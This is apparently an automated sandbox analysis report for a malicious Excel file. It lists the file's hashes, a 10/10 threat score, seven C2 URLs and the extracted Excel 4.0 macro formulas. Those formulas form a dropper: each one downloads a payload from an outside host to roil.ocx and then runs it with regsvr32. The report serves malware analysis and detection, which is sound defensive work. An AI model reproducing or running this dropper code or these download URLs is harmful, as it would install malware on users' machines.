General

  • Target

    82e320b321317d4151cd90e69e2ddfeea401965f01d792cd19b1e87f2f27dadf

  • Size

    38KB

  • Sample

    241120-qy6w6axhrq

  • MD5

    a45b42fdbb6f1815412aca2e3b2bae01

  • SHA1

    a65d1c4e995fadfe93bbbeed9e9f8b43d7fd2e5a

  • SHA256

    82e320b321317d4151cd90e69e2ddfeea401965f01d792cd19b1e87f2f27dadf

  • SHA512

    dc838467ca1577195b92188b35cd1ef28f78ff2a3f1e97bd62c282152e671f3bc7fde488182af07cc53f0d40ae3a3e5da99537d235c20d6b712d66d26cc47334

  • SSDEEP

    768:1snACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:WA6gvOZZ1ZYpoQ/pMAeVIyP54T

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/

https://franciscosobrado.com/wp-content/xp/

https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/

https://www.curtisse.com/wordpress/kXUx9P38X/

https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/

https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/","..\roil.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/","..\roil.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://franciscosobrado.com/wp-content/xp/","..\roil.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/","..\roil.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.curtisse.com/wordpress/kXUx9P38X/","..\roil.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/","..\roil.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/","..\roil.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

Targets

    • Target

      82e320b321317d4151cd90e69e2ddfeea401965f01d792cd19b1e87f2f27dadf

    • Size

      38KB

    • MD5

      a45b42fdbb6f1815412aca2e3b2bae01

    • SHA1

      a65d1c4e995fadfe93bbbeed9e9f8b43d7fd2e5a

    • SHA256

      82e320b321317d4151cd90e69e2ddfeea401965f01d792cd19b1e87f2f27dadf

    • SHA512

      dc838467ca1577195b92188b35cd1ef28f78ff2a3f1e97bd62c282152e671f3bc7fde488182af07cc53f0d40ae3a3e5da99537d235c20d6b712d66d26cc47334

    • SSDEEP

      768:1snACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:WA6gvOZZ1ZYpoQ/pMAeVIyP54T

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks